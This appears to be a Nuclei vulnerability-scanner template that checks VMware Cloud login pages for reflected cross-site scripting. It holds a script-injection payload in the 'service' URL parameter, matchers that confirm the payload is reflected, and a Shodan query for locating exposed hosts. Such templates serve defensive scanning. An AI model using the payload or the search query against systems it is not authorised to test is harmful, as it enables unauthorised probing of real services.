nuclei-templates/vulnerabilities/vmware/vmware-cloud-xss.yaml

34 lines
690 B
YAML

id: vmware-cloud-xss
info:
name: VMWare Cloud - Cross Site Scripting
author: tess
severity: medium
metadata:
verified: true
shodan-query: title:"Vmware Cloud"
tags: vmware,xss,cloud
requests:
- method: GET
path:
- '{{BaseURL}}/login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- 'let tokens = "'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200